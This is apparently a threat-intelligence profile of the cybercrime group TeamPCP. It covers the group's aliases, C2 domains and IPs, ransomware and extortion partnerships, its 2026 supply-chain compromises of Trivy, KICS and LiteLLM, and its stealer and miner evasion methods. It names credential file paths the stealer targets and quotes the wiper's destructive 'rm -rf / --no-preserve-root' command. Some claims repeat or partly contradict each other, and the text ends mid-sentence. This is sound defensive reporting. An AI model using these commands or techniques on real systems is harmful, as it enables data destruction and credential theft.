National Cyber Warfare Foundation (NCWF)


0 user ratings
2026-08-06 18:59:06
error

 TeamPCP ---still researching



Also tracked as: PCPcat, DeadCatx3, ShellForce, CipherForce, Altered Spider, Persy PCP, CipherForce, CanisterWorm, SHADOW-WATER-058, TA-NATALSTATUS,

IronErn, ShadowRay 2.0 



Country of origin for TeamPCP remains unknown,
and cybersecurity researchers have not attributed the group to any specific
nation-state with confidence. They have been active since late 2025, and are
known for executing massive, multi-ecosystem software supply chain attacks and
automated cloud-native compromises.

Timeline of Identities




  • TA-NATALSTATUS
    (2020–2025):
    The earliest tracked identity, primarily focused on
    exploiting exposed Redis servers to deploy cryptocurrency
    miners. This activity was an evolution of campaigns noted by Trend
    Micro in 2020. 

  • IronErn
    (Mid–Late 2025):
    Also known as ShadowRay 2.0, this
    identity was associated with hijacking artificial intelligence (AI)
    infrastructure (specifically Ray clusters) to create a self-propagating
    botnet. 

  • TeamPCP
    (Late 2025–Present):
    The group's current public branding, under
    which they have expanded into supply chain attacks and open-source
    software compromise, while retaining the same underlying infrastructure
    and tools used in the TA-NATALSTATUS and IronErn eras. 



Attribution Challenges & False Flags



The group actively employs false flag operations to
obscure its true location and mislead investigators:




  • Russian
    Markers
    :
    Malware samples contain Russian cultural references
    (e.g., "Koschei," "Baba Yaga") and code that
    exempts systems with Russian language settings (ru_* locale). 

  • Contradictory
    Targets
    :
    Despite the Russian markers, the group deploys
    destructive wipers against Iranian infrastructure and
    includes logic targeting Israeli systems, creating
    conflicting geopolitical signals. 

  • Analyst
    Consensus
    :
    Firms like Antiy Labs and Gurucul assess
    these markers as deliberate "noise" designed to fail traditional
    attribution mechanisms rather than authentic indicators of origin.

TeamPCP's current infrastructure
(as of August 2026) is a sophisticated, multi-layered hybrid network combining
ephemeral cloud services, typosquatted domains, and decentralized blockchain
technology to ensure resilience against takedowns. 



Primary Command and Control (C2)



The group relies heavily on typosquatted
domains
that mimic legitimate security and AI vendors to blend
malicious traffic with normal operations.  Key active or recently
observed domains include:




  • scan.aquasecurtiy[.]org (mimicking
    Aqua Security)

  • checkmarx[.]zone (mimicking
    Checkmarx)

  • models.litellm[.]cloud (mimicking
    LiteLLM)



These domains resolve to IP
addresses hosted by bulletproof hosting providers, primarily Ghosty
Networks LLC
(Luxembourg) and TECHOFF SRV LIMITED (Netherlands).  Specific
IPs identified include 45.148.10.212, 83.142.209.11,
and 46.151.182.203. These servers typically run AdaptixC2 and Havoc frameworks. 



Decentralized Fallback Infrastructure



A defining feature of TeamPCP's
modern infrastructure is its use of the Internet Computer Protocol
(ICP)
blockchain for resilient C2. 




  • ICP
    Canisters:
    The group utilizes smart contracts on the ICP
    blockchain (e.g., tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io) as
    "dead-drop" C2 servers. 

  • Resilience: Because
    this infrastructure is decentralized, it cannot be seized or taken down by
    traditional domain registrars or hosting providers, serving as a critical
    fallback when primary servers are blocked. 



Legacy and Staging Infrastructure



The group maintains continuity
with its historical operations (TA-NATALSTATUS/IronErn) through persistent
domains:




  • masscan[.]cloud: Still
    serves as a core operational hub, with subdomains
    like matrix.masscan[.]cloud acting as backup backends. 

  • natalstatus[.]org: While
    less active as a primary C2, it remains linked to the group's staging
    framework and historical payload paths (e.g., /EP9ts2/). 



Operational Tempo



Recent analysis indicates a shift
in infrastructure usage following their March–May 2026 supply chain cascade.
While the group previously used infrastructure for rapid, broad exploitation,
current patterns suggest a pivot toward monetization, using the
harvested credentials from their supply chain compromises to facilitate
ransomware operations (via the Vect RaaS partnership) rather
than expanding the botnet further. 

Operational Connection



Security researchers at Oligo Security have
confirmed that these entities represent a continuous operational history
spanning from 2020 to the present. The connection is established through
significant overlaps in:




  • Infrastructure: Shared
    use of domains
    like natalstatus.org and masscan.cloud (including
    subdomains like matrix.masscan.cloud). 

  • Tooling: Identical
    malware deployment paths (e.g., /EP9ts2/), script filenames
    (ndt.sh, nnt.sh, is.sh, rs.sh), and command-and-control
    servers. 

  • Tradecraft: Consistent
    staging techniques and backend infrastructure usage across different
    campaigns. 



Operational Indicators



While the physical location is unconfirmed, some operational details offer limited geographic
clues:




  • Infrastructure: Early
    command-and-control servers were hosted in Singapore, with additional infrastructure
    linked to the U.S. and UAE

  • Affiliate
    Base
    :
    Their partner, Vect Ransomware Group, waives
    entry fees for affiliates from CIS countries (Russia and
    former Soviet states), suggesting a potential operational focus or
    membership base in that region, though this does not confirm TeamPCP's own
    origin. 

  • Language: Communications are
    primarily in English
    , often with non-native phrasing, and
    occasional references to African politics (specifically Kenya) have been
    noted in their Telegram channels, though these are considered weak
    indicators.
     


TeamPCP (also tracked as PCPcat, DeadCatx3, ShellForce,
and CipherForce
) is a financially and geopolitically
motivated
cybercriminal group that emerged in late 2025,
specializing in cloud-native infrastructure and software
supply chain
attacks.  The group initially conducted
large-scale worm-driven campaigns exploiting exposed Docker APIs, Kubernetes clusters,
and Redis instances to build botnets for ransomware and cryptomining



In March 2026, TeamPCP
shifted tactics to compromise widely used CI/CD security
tools, including Trivy, Checkmarx KICS, and LiteLLM.  By
stealing GitHub Actions tokens and PyPI publishing
credentials, they deployed a "TeamPCP Cloud Stealer" payload
designed to harvest cloud provider credentials (AWS, GCP,
Azure), SSH keys, and Kubernetes tokens.  The group utilizes novel
infrastructure such as Internet Computer Protocol (ICP) blockchain
canisters for command-and-control and employs self-propagating worms
like CanisterWorm to infect additional packages across npm and PyPI.
 



Key operational characteristics include:




  • Hybrid
    Motivation
    : Primarily driven by financial gain through
    credential theft and access brokering, with secondary geopolitical objectives
    including destructive attacks on Iranian infrastructure

  • Cascading
    Compromise
    : They leverage stolen credentials from one compromised
    tool to gain access to the next, creating a multi-ecosystem supply chain
    attack across GitHub, Docker Hub, npm,
    and PyPI

  • Operational
    Security
    : Uses RSA-4096/AES-256-CBC encryption
    for exfiltration, typosquatted domains (e.g., aquasecurtiy[.]org),
    and YouTube kill-switches in backdoor payloads. 

  • Partnerships:
    Functions as an access generation engine feeding into ransomware
    ecosystems, with formal partnerships noted with Vect Ransomware
    Group
    and collaborations with Lapsus$



TeamPCP operates as a primary initial access
broker
, maintaining a complex web of partnerships to
monetize stolen credentials through ransomware deployment and data
extortion.  Their specific partners include:



Primary Ransomware & Extortion Partners



     Vect
Ransomware Group
 



In late March 2026, TeamPCP announced a
formal operational partnership with Vect, a Russian-speaking
Ransomware-as-a-Service (RaaS)
operation
.  Under this
agreement, TeamPCP supplies the initial access gained through supply chain
compromises (specifically the Trivy, KICS, and LiteLLM attacks),
while Vect handles the encryption deployment and extortion.  Sophos
confirmed by July 2026 that Vect had successfully deployed ransomware using
credentials sourced directly from TeamPCP operations. 



     Lapsus$



 TeamPCP explicitly collaborates with the
notorious extortion group Lapsus$ to monetize stolen data.

Following the March 2026 supply chain campaigns, TeamPCP transferred
approximately 300 GB of compressed credentials to Lapsus$, who
utilized them to target multi-billion-dollar companies and sell access on the
dark web.  Mandiant and Wiz researchers confirmed this active
collaboration, noting that Lapsus$ leverages TeamPCP’s deep access to SaaS
environments for high-profile data leaks. 



Operational & Ecosystem Allies



xpl0itrs 



This group maintains a close technical partnership
with TeamPCP, engaging in joint operations such as the CanisterWorm deployment
and the Bitwarden CLI compromise
in April
2026.  xpl0itrs functions as a secondary outlet for TeamPCP’s
initial access, sharing tooling and victim lists within a tightly integrated
supply chain-focused cybercrime ecosystem. 



BreachForums



               While
technically a marketplace, BreachForums serves as a critical force multiplier through
its formal alliance with Vect and TeamPCP.
In
April 2026, the partnership facilitated the distribution of affiliate keys to
BreachForums' entire user base (approx. 300,000 members), effectively
industrializing the distribution of TeamPCP-sourced access for mass ransomware
campaigns. 



ShinyHunters / UNC6240 



TeamPCP brokers access to ShinyHunters (also
tracked as UNC6240), who utilize the stolen credentials for large-scale
repository cloning and data theft.
Notable instances include the
cloning of over 300 private Cisco repositories containing AI
products and sensitive customer code. 



Internal Monetization Brands



TeamPCP also operates its own parallel monetization tracks
to ensure redundancy:




  • CipherForce:
    TeamPCP’s proprietary ransomware brand, used for direct operations
    separate from the Vect partnership. 

  • ShellForce:
    A persona used specifically for leaking and selling exfiltrated
    data. 



TeamPCP has established
a sophisticated ecosystem of partnerships
designed to industrialize the
monetization of stolen credentials, moving beyond simple data theft to
coordinated ransomware deployment and large-scale extortion. These alliances function as a
"reverse kill chain," where access is secured via supply chain
compromises first, and targets are selected from the resulting credential
archive later.
 



The Vect-BreachForums Industrial Alliance



The most significant partnership
is the formal triadbetween
 TeamPCP, Vect Ransomware Group, and BreachForums
.
Announced in late March 2026 and operationalized on April 16, 2026,
this alliance created an unprecedented "mass-affiliate" model:




  • Role
    Division
    : TeamPCP acts as the exclusive initial access
    broker
    , supplying credentials harvested from compromised CI/CD tools
    (Trivy, KICS, LiteLLM).  Vect provides the ransomware
    infrastructure
    (C++ based ChaCha20-Poly1305 encryption), while
    BreachForums supplies the human capital

  • Scale
    of Mobilization
    : Unlike traditional RaaS models that recruit
    affiliates selectively, this partnership distributed Vect affiliate keys
    to all ~300,000 registered users of BreachForums
    simultaneously.  This effectively converted a massive forum user
    base into an instant ransomware deployment army.

  • Operational
    Impact
    : By July 2026, Sophos confirmed active ransomware
    deployments where Vect operators selected victims directly from TeamPCP’s
    stolen credential archives. This model removes the need for affiliates to
    possess technical exploitation skills, as the "entry ticket"
    (valid cloud tokens) is pre-supplied by TeamPCP. 



Extortion and Data Monetization Partners

To maximize the value of
exfiltrated data (estimated at
300 GB of compressed
credentials), TeamPCP collaborates with specialized extortion groups:



Lapsus$ 



TeamPCP maintains an explicit
collaboration with Lapsus$ to handle high-profile extortion
campaigns. While TeamPCP focuses on the technical infiltration of SaaS
environments, Lapsus$ leverages its reputation for aggressive public shaming
and social engineering to pressure victims. Wiz researchers confirmed that
TeamPCP transfers validated credentials to Lapsus$, who then target
multi-billion-dollar companies for data leaks and ransom demands. 



ShinyHunters (UNC6240)



 A critical operational link
exists between TeamPCP and ShinyHunters. Following the March 2026 Trivy
compromise, credentials harvested by TeamPCP were utilized by ShinyHunters to
breach Cisco. This collaboration resulted in the cloning of over 300
private GitHub repositories
, including source code for AI products and
tools used by US government agencies (FBI, DHS, NASA).  This
partnership highlights a "hand-off" model where TeamPCP provides the
foothold, and ShinyHunters executes the deep data exfiltration. 



*The relationship
between TeamPCP and ShinyHunters
(also
tracked as UNC6240) is hostile and opportunistic, rather than a formal
partnership.  While they operate in the same ecosystem, their
interactions are defined by theft, deception, and conflicting public
narratives.



The "Scam" and Hostile Takeover



Contrary to early reports of
collaboration, TeamPCP leadership
has explicitly stated that ShinyHunters is not a partner
.  In
a May 9, 2026 interview, the TeamPCP leader detailed a specific incident of
betrayal:




  • The
    Infiltration:
     



A member
of ShinyHunters infiltrated the private operator chat
of Vect (TeamPCP’s ransomware partner), demonstrating a failure
in TeamPCP’s vetting or access control mechanisms for their own criminal
ecosystem.




  • The
    Theft:
     



The ShinyHunters member agreed to
split profits on a bundle of stolen credentials, downloaded the data, and
then refused to pay




  • The
    Smear
    :
     



To cover the theft and discredit
TeamPCP, ShinyHunters released a "mix of real and fabricated chats"
portraying the interaction as a legitimate partnership or dispute, rather than
a scam. 



·       
Data Handover:



The thief was able to download a full
bundle of stolen credentials after agreeing to a profit-split, indicating that
TeamPCP lacks technical safeguards (such as staged data releases or escrow
mechanisms) to prevent partners or infiltrators from absconding with the entire
dataset.



·       
Reactive Counter-Measures



Once the theft was identified, TeamPCP
employed the following damage control tactics:



·       
Public Discrediting:



 In a May 9, 2026 interview
with Inside Darknet, the TeamPCP leader explicitly labeled the
interaction a "scam" and "shitty business practice," aiming
to destroy ShinyHunters' reputation within the cybercriminal underground. 



·       
Narrative Correction: 



They released "a mix of real and
fabricated chats" (mirroring ShinyHunters' own tactics) to prove the theft
occurred and to distance themselves from subsequent high-profile breaches (like
the CERT-EU attack) that ShinyHunters executed using the
stolen data. 



·       
Attribution Shift: 



TeamPCP leadership publicly clarified their
non-involvement in government targets ("We don't even target gov"),
attempting to shift the blame for the CERT-EU breach entirely onto ShinyHunters
to avoid law enforcement scrutiny. 



Strategic Implications



The incident highlights that TeamPCP’s security model is trust-based within
a hostile environment.
  They have no technical method to revoke
access to credentials once they are downloaded by an affiliate or partner.

Their primary defense is the threat of reputational ruin and
the potential for retaliatory doxxing or law enforcement tipping, which serves
as the only deterrent against internal theft in the cybercriminal ecosystem.



Divergent Operational Goals



The two groups have
fundamentally different targeting doctrines, which led to friction over
specific breaches:




  • Targeting
    Conflicts
    :



 TeamPCP
publicly claims to exclude governments and non-profits from their direct
operations
. However, ShinyHunters used the stolen
TeamPCP-sourced credentials to breach the European Commission (CERT-EU),
stealing 340 GB of data from 42 EU departments.
  TeamPCP
leaders subsequently clarified they did not perform this exfiltration and do
not target government entities, attributing the act solely to ShinyHunters.




  • Cisco
    Breach:
     



While TeamPCP
provided the initial access vector
(via the compromised Trivy scanner), ShinyHunters independently
executed the deep intrusion into Cisco, cloning over 300 private
repositories
(including AI and government-related code) and
launching their own extortion campaign with an April 3 deadline. 



The "Convergence" Dynamic



Despite the hostility, the groups
are functionally linked in a "convergence of cybercriminal
ecosystems"
:




  • Access
    vs. Extortion
    :
    T



TeamPCP
acts as the initial access broker
, compromising the supply
chain to harvest credentials.  ShinyHunters acts as
a predatory downstream actor,
monitoring these compromises
to steal the harvested credentials for their own high-profile extortion
campaigns. 




  • Blast
    Radius
    :
     



This dynamic means that even without a formal
agreement, TeamPCP’s compromises directly enable ShinyHunters’ operations.

Security researchers note that this creates a complex threat landscape
where defenders must contend with multiple independent groups exploiting the
same initial breach.



Technical and Operational Allies



xpl0itrs This
group serves as TeamPCP’s primary technical co-conspirator. They jointly
developed and deployed CanisterWorm, the first self-propagating npm
worm utilizing Internet Computer Protocol (ICP) canisters for
command-and-control.  Their partnership extends to the Bitwarden
CLI
compromise in April 2026.  xpl0itrs often acts as a
secondary outlet for selling access derived from TeamPCP’s initial breaches,
such as the alleged 569 GB breach of RapidFort claimed in July
2026. 



Internal Redundancy:



 CipherForce



To ensure operational resilience
and avoid reliance solely on external partners, TeamPCP operates its own
proprietary ransomware brand, CipherForce.  While the
Vect partnership handles mass distribution via BreachForums, CipherForce is
used for direct, controlled operations where TeamPCP retains full authority
over encryption and negotiation, allowing them to test new tactics without exposing
their primary affiliates. 



TeamPCP compromised a specific
set of high-value CI/CD and developer security tools
between March 19 and April 22, 2026, executing a cascading attack
where credentials stolen from one tool were used to compromise the next. 



Primary CI/CD & Security Tool Compromises



Trivy (Aqua Security)




  • Compromise
    Date:
    March 19, 2026 (following an initial breach on Feb
    28). 

  • Vector: TeamPCP
    exploited a pull_request_target vulnerability to steal a GitHub
    Actions PAT, then hijacked release tags (v0.69.4) to inject malware
    into GitHub Actions, binaries, and Docker
    Hub images

  • Impact: As
    the initial pivot point, this compromise provided the GitHub
    Actions tokens
    and cloud credentials used to
    attack subsequent tools. 



Checkmarx KICS (Keeping Infrastructure as Code
Secure)




  • Compromise
    Date:
    March 23, 2026. 

  • Vector: Using
    credentials harvested from the Trivy compromise, the group poisoned KICS
    GitHub Actions
    (all 35 tags), OpenVSX extensions,
    and Docker images

  • Impact: Allowed
    the theft of Infrastructure-as-Code secrets and further expanded access to
    enterprise cloud environments. 



LiteLLM (BerriAI)




  • Compromise
    Date:
    March 24, 2026. 

  • Vector: Compromised PyPI
    publishing credentials
    (stolen from CI/CD pipelines running the
    trojanized Trivy action) to publish malicious versions 1.82.7 and 1.82.8

  • Impact: Targeted
    AI infrastructure, harvesting API keys for over 100 LLM providers (OpenAI,
    Anthropic, etc.) alongside cloud credentials. 



Telnyx Python SDK




  • Compromise
    Date:
    March 27, 2026. 

  • Vector: Similar
    to LiteLLM, malicious versions were published to PyPI using
    stolen publishing rights. 

  • Impact: Compromised
    telecommunications API credentials and messaging workflows integrated into
    CI/CD pipelines. 



Secondary & Related Compromises



Bitwarden
CLI




  • Compromise
    Date:
    April 22, 2026. 

  • Vector: A
    malicious version (2026.4.0) was published to npm by
    exploiting a compromised GitHub Action in Bitwarden’s CI/CD pipeline
    (linked to the broader TeamPCP campaign). 

  • Impact: Targeted
    developer workstations and pipelines to harvest SSH keys, crypto
    wallet data
    , and npm tokens, utilizing a self-propagating
    worm mechanism. 



TanStack
& Others




  • The
    campaign also affected TanStack (via OIDC abuse in April
    2026) and over 45 npm packages (including @EmilGroup and @opengov)
    via a self-propagating worm (deploy.js) that autonomously published
    malicious patch versions using stolen tokens. 



The triad consisting
of TeamPCP, Vect Ransomware Group,
and BreachForums operates as an integrated, industrialized ransomware
ecosystem rather than three separate entities collaborating
ad-hoc.  Their relationship is defined by a strict division
of labor
that inverts the traditional ransomware kill chain:



Operational Workflow: The "Reverse Kill
Chain"



1.       TeamPCP:
The Access Engine (Supply Chain Layer)
 



TeamPCP functions exclusively as
the initial access broker.  Instead of selecting specific
victims first, they compromise high-volume software supply chain components
(e.g., Trivy, LiteLLM, KICS) to harvest a
massive archive of over 500,000 credentials from CI/CD
pipelines.  They do not deploy ransomware themselves in this triad;
their sole output is a validated inventory of compromised cloud tokens and API
keys. 



2.       Vect:
The Monetization Infrastructure (RaaS Layer)
 



Vect provides
the weaponization and extortion capability. Unlike traditional RaaS models
where affiliates must find their own way into a network, Vect operators
simply search TeamPCP’s pre-existing credential archive to
select victims.  Vect supplies the C++ ransomware payload (using
ChaCha20-Poly1305 encryption), the TOR-based leak site, and the
negotiation infrastructure.  This allows affiliates to skip the
exploitation phase entirely and move straight to deployment. 



3.      
BreachForums: The Distribution & Operational
Layer



 BreachForums serves as
the force multiplier and operational platform. On April 16, 2026,
the triad operationalized a "mass-affiliate" model where all ~300,000
registered BreachForums users
were automatically issued Vect affiliate
keys.  The forum provides:




  • Escrow
    Services
    :
    A Monero-based multi-signature escrow system for
    handling ransom payments. 

  • Affiliate
    Management
    :
    Tiered incentive structures (offering up to 88%
    profit share
    ) and support for less technical operators. 

  • Instant
    Mobilization
    :
    Converting a passive forum user base into an
    active ransomware deployment army without selective recruitment. 



Strategic Significance



This triad represents a shift
from targeted intrusion to industrialized exploitation.
  By
decoupling access generation (TeamPCP) from victim selection and encryption
(Vect/BreachForums), the group creates a persistent threat where
credentials stolen in March 2026 can be weaponized months
later
.  The model lowers the technical barrier to entry,
allowing any BreachForums member to launch a sophisticated ransomware attack
against a major enterprise simply by using a pre-stolen token provided by
TeamPCP. 



TeamPCP utilizes a
sophisticated payload known as the "TeamPCP Cloud Stealer" (and
variants like SANDCLOCK and CanisterWorm) to
harvest a comprehensive array of credentials from CI/CD runners, developer
workstations, and cloud environments.  The group targets secrets that facilitate
lateral movement across the entire software supply chain.
 



Cloud Provider & Infrastructure Credentials



The primary objective is to
gain control over cloud infrastructure.
The stealer specifically
targets:




  • Cloud
    Access Keys:
    AWS Access Keys and Secret Keys
    (~/.aws/credentials), GCP Service Account JSON keys, and Azure Service
    Principals/Environment Variables. 

  • Kubernetes
    Secrets
    :
    ServiceAccount tokens, kubeconfig files
    (~/.kube/config), and cluster admin credentials. 

  • Container
    Registry Tokens
    :
    Docker Hub, GitHub Container Registry
    (GHCR), and Amazon ECR authentication tokens. 

  • Infrastructure-as-Code
    (IaC) State:
    Terraform state files containing embedded
    secrets and provider configurations.



CI/CD & Version Control Tokens



To propagate the attack and
maintain persistence within pipelines, TeamPCP extracts:




  • GitHub
    Personal Access Tokens (PATs):
    Specifically those
    with repo, workflow, and write:packages scopes, often
    harvested by dumping the memory of
    the Runner.Worker process. 

  • OIDC
    Tokens
    :
    OpenID Connect tokens extracted from runner memory to
    impersonate identities in cloud environments.

  • Package
    Manager Tokens:
    PyPI API tokens (used to
    poison packages like LiteLLM), npm publish tokens (used
    for the CanisterWorm propagation), and OpenVSX publisher
    tokens. 

  • GitLab
    CI/CD Variables
    :
    Protected variables and deploy keys stored
    in runner environments.



Application & AI API Keys



Leveraging the compromise of AI-focused tools
like LiteLLM and Xinference, the group harvests:




  • LLM
    Provider Keys:
    API keys for OpenAI, Anthropic, Azure
    AI
    , Mistral, and Google Vertex AI.

  • Communication
    Webhooks
    :
    Slack incoming webhook URLs and Discord bot
    tokens. 

  • Database Credentials: Connection
    strings for PostgreSQL, MySQL, MongoDB, and Redis found
    in .env files and configuration directories. 



Local Developer & Cryptocurrency Secrets



On developer workstations and build agents, the malware scans for:




  • SSH
    Keys:
    Private keys (id_rsa, id_ed25519) for
    server access and Git operations. 

  • Cryptocurrency
    Wallets
    :
    Seed phrases, private keys, and credential files for
    wallets like MetaMask, Exodus, and Electrum.

  • VPN & TLS Certificates: OpenVPN
    configurations, private TLS keys, and certificate authorities.



All
harvested data is typically compressed into an encrypted archive

(e.g., tpcp.tar.gz or love.tar.gz) using AES-256-CBC with RSA-4096 wrapped
keys before exfiltration to typosquatted domains
(e.g., scan.aquasecurtiy[.]org) or fallback GitHub repositories
(e.g., tpcp-docs). 



TeamPCP deployed a
specific destructive wiper payload named Kamikaze
(also
referred to as the Iran-focused Kubernetes wiper) against Iranian
infrastructure.  This payload was integrated into their
broader CanisterWorm malware family and activated

in late March 2026



Wiper Mechanics and Targeting



The Kamikaze wiper
operates via a "decision tree" that distinguishes between
Iranian and non-Iranian systems based on locale and timezone settings:




  • Target
    Identification:
    The malware scans for specific indicators,
    primarily the Asia/Tehran timezone or the fa_IR (Farsi)
    locale setting. 

  • Kubernetes
    Clusters
    :
    If an Iranian system
    is detected
    within a Kubernetes environment, the wiper deploys a
    privileged DaemonSet
    named host-provisioner-iran into
    the kube-system namespace.  
    This DaemonSet schedules a destructive
    container (often named kamikaze) across every node in
    the cluster, including the control plane.
      The
    container mounts the host's root filesystem and executes a recursive
    deletion command
    (rm -rf / --no-preserve-root), effectively
    bricking the entire cluster and forcing a reboot.

  • Standalone
    Hosts
    :
    On non-Kubernetes Iranian systems, the payload executes the same
    recursive deletion logic directly on the host machine, rendering the
    operating system unusable. 

  • Non-Iranian
    Systems
    :
    If the target does not match Iranian indicators, the malware
    bypasses the wiper routine and instead installs the standard CanisterWorm backdoor
    for persistence and credential theft. 



Operational Context



The deployment of Kamikaze marked
a significant escalation for TeamPCP, transitioning the group from
purely financially motivated
cybercrime to geopolitically motivated
destruction
.  Researchers assess this move as potentially
opportunistic—a method for the group to gain notoriety and signal
capability—rather than evidence of direct state sponsorship, though the
precision of the targeting suggests a deliberate intent to disrupt Iranian
digital infrastructure amidst broader regional tensions.



TeamPCP consistently targets
trusted software distribution channels
rather than end users directly.
Operations focus on compromising packages, CI/CD infrastructure, developer
workflows, and cloud environments where a single successful intrusion can
cascade into thousands of downstream organizations.



Observed operational patterns include:




  • Software
    supply chain compromise

  • Malicious
    package publishing on npm and PyPI

  • Compromise
    of GitHub Actions workflows

  • Credential
    theft from cloud environments

  • SSH
    key and API token harvesting

  • Kubernetes
    secret extraction

  • Source
    code theft

  • Cloud
    infrastructure compromise

  • Extortion
    following data theft

  • Ransomware
    access brokerage



Malware ecosystem



Security researchers and the FBI have attributed multiple
malware families to TeamPCP campaigns.




  • CanisterWorm harvests
    cloud credentials, API tokens, SSH keys, and authentication material from
    AWS, Azure, and Google Cloud Platform environments.

  • SANDCLOCK extracts
    AWS credentials, Kubernetes ServiceAccount tokens, environment variables,
    and cryptocurrency wallet data.

  • Mini
    Shai-Hulud
    is a self-propagating software supply chain worm
    capable of spreading across npm and PyPI ecosystems.

  • Miasma expands
    on Mini Shai-Hulud techniques by poisoning development environments while
    harvesting credentials.



Cloud and AI targeting



Much of TeamPCP’s activity has centered around AI companies,
cloud platforms, developer infrastructure, and enterprise software vendors.



Public reporting and alleged victim
claims have included organizations such as OpenAI, Mistral AI, Lightning AI,
Mercor, GitHub, Cisco, and the European Commission. Rather than deploying
ransomware immediately, the group frequently monetizes access by stealing
repositories, cloud credentials, proprietary source code, and development
secrets.



Shift toward extortion



Recent activity indicates TeamPCP
has expanded beyond software supply chain compromise into direct extortion.
According to the FBI, the group has published victim names on a public leak
site, threatened organizations with data disclosure, and collaborated with
other cybercriminal groups to monetize stolen access.



The advisory also warns that
credentials stolen during TeamPCP intrusions should be treated as a long-term
risk because affiliated threat actors may continue exploiting them well after
the initial compromise.



Current threat assessment



TeamPCP remains one of the most
significant supply chain threats currently facing organizations that rely on
modern software development pipelines. By compromising trusted developer tools
rather than individual victims, the group can rapidly affect thousands of
downstream environments through a single malicious update.

**********Added August 16,2026******

TeamPCP (also tracked
as UNC6780 by Google
) is a financially motivated cybercrime
group, not a state-sponsored Advanced Persistent Threat
(APT).  Researchers classify the organization as a loose-knit
collective of teenagers and young adults
driven by economic
gain through ransomware, extortion, and cryptomining rather than geopolitical
objectives. 

The group first emerged in late
2025
and is primarily known for executing massive cloud-native and supply
chain attacks
across five software
ecosystems
: GitHub
Actions, Docker Hub, npm, PyPI, and OpenVSX.
  Their
notable campaigns include compromising trusted security tools
like Trivy and KICS to harvest credentials, and they have
explicitly stated they have moved away from encryption-based extortion in favor
of faster, less destructive data theft and access brokering. 

Operational
Profile and Evolution

TeamPCP (tracked as UNC6780)
operates as a financially motivated cybercriminal collective rather
than a state-sponsored entity.  Emerging in late 2025, the group
evolved from cryptomining operations into a sophisticated supply chain
attack specialist
.  Their primary business model involves
compromising trusted software development tools to harvest credentials, which
are then sold, used for lateral movement, or leveraged in partnership with
ransomware groups like Vect. 

The group is characterized by its cloud-native
approach
, exploiting misconfigured Docker APIs, Kubernetes
clusters, and CI/CD pipelines.  Unlike traditional APTs that focus on
long-term espionage, TeamPCP prioritizes high-velocity, high-volume
data theft
, having exfiltrated over 300 GB of data and
harvested approximately 500,000 credential sets across more
than 1,000 SaaS environments by mid-2026. 

 

Major
Attack Campaigns

The
Cascading Supply Chain Offensive (March 2026)

The group's most significant operation
occurred between March 19 and March 27, 2026,
executing
a "cascading" attack across five major ecosystems: GitHub
Actions, Docker Hub, npm, PyPI, and OpenVSX


  • Trivy
    Compromise
    :
    Exploiting
    a pull_request_target vulnerability (CVE-2026-33634), the group
    injected the SANDCLOCK credential stealer into
    the Trivy vulnerability scanner.  This compromised
    over 75 version tags, affecting an estimated 10,000+ CI/CD pipeline runs.

  • KICS
    and LiteLLM
    :
    Using credentials stolen from Trivy, they
    subsequently compromised Checkmarx KICS and the AI
    gateway LiteLLM. The LiteLLM breach alone impacted over 2,400
    organizations, with stolen API keys remaining active months later. 

  • npm
    Worm (CanisterWorm):
    The group deployed a self-propagating
    worm across 47+ npm packages, utilizing decentralized ICP
    Canister nodes
    for command-and-control (C2) to resist
    takedowns. 

The
GitHub Internal Breach (May 2026)

In a landmark escalation, TeamPCP
compromised GitHub's internal infrastructure on May 20, 2026.  By
poisoning a Visual Studio Code extension available on the
official marketplace, they gained access to an employee's
workstation.  This allowed them to exfiltrate source code from
approximately 3,800 internal private repositories, including
proprietary security tools.  The group subsequently attempted to sell
this data on underground forums for at least $50,000

Tactics,
Techniques, and Procedures (TTPs)

TeamPCP distinguishes itself
through operational integration rather than novel exploit
development.  They heavily utilize modified open-source tools and
well-known vulnerabilities to build a modular criminal platform.


  • Credential
    Harvesting
    :
    Their payloads specifically target cloud provider
    metadata (AWS IMDS, Azure MSI), CI/CD runner tokens, and AI API
    keys. 

  • Decentralized
    C2:
    They were the first observed group to use Internet
    Computer Protocol (ICP) Canisters
    for resilient C2
    infrastructure, making it difficult to disrupt their communications. 

  • Monetization
    Strategy
    :
    While initially focused on cryptomining (XMRig) and
    proxy services, the group has shifted toward access brokering and ransomware
    facilitation
    .  In late March 2026, they formalized a
    partnership with the ransomware affiliate Vect, trading their stolen
    access for ransomware deployment capabilities. 

Current
Status and Impact

As of August 2026, TeamPCP remains highly active. Recent
reports indicate that credentials stolen during their March and April campaigns
are still being weaponized. The group has demonstrated a willingness to
deploy destructive wipers in specific geographic regions,
layering data destruction over theft to maximize pressure on
victims.  Their success has prompted major platforms like npm and
GitHub to implement stricter security measures, including mandatory 2FA for package
publishing and enhanced monitoring of CI/CD workflows. 

TeamPCP (UNC6780) did not
develop unique cryptomining software from scratch; instead, they deployed
heavily modified versions of the open-source XMRig miner.
Their innovation lay in the loader mechanisms and evasion
techniques
designed to sustain mining operations on compromised cloud
infrastructure. 

Custom
Loaders and Deployment

The group utilized custom shell scripts and loaders to
deploy XMRig with specific configurations to evade detection:


  • Memory-Resident
    Execution
    :
    In campaigns identified in mid-2026, TeamPCP
    employed loaders that deleted the miner binary from the disk immediately
    after execution, forcing the malware to run purely in memory to
    bypass file-based antivirus scans. 

  • Process
    Masquerading
    :
    Their deployment scripts renamed the XMRig
    process to mimic legitimate system daemons (e.g., ssh, systemd)
    and utilized LD_PRELOAD hooks to hide watchdog processes
    that ensured the miner remained active. 

  • Layered
    Obfuscation:
    The group used layered XOR encryption (with
    keys such as I3F0 and CLIENT) to obfuscate the miner's
    configuration files and command-line arguments, hiding the mining pool
    addresses and wallet IDs from static analysis. 

Evasion
and Persistence Tactics

To maximize mining revenue and
longevity, TeamPCP integrated several advanced operational security measures
into their cryptomining modules:


  • Non-Root
    Impersonation:
    Unlike typical cryptojacking operations that
    seek root access, TeamPCP's later campaigns deliberately operated
    under low-privileged user accounts.  They
    abused Linux Pluggable Authentication Modules (PAM) to
    switch identities without passwords, creating a "forensic
    smokescreen" that scattered activity across unmonitored
    accounts. 

  • Resource
    Throttling
    :
    Their configurations often limited CPU usage
    (e.g., to 60%) and paused mining when specific high-priority processes
    were detected to avoid triggering performance-based alerts. 

  • Competitor
    Elimination
    :
    The deployment scripts included logic to
    identify and terminate competing cryptominers and delete rival crontab
    entries, ensuring TeamPCP maintained exclusive control over the host's
    resources. 

TeamPCP evades cloud provider
detection by blending malicious activity with legitimate development traffic
and exploiting the inherent trust placed in CI/CD pipelines. Their evasion
strategy relies on living-off-the-land techniques, memory-only
execution
, and decentralized infrastructure

Traffic
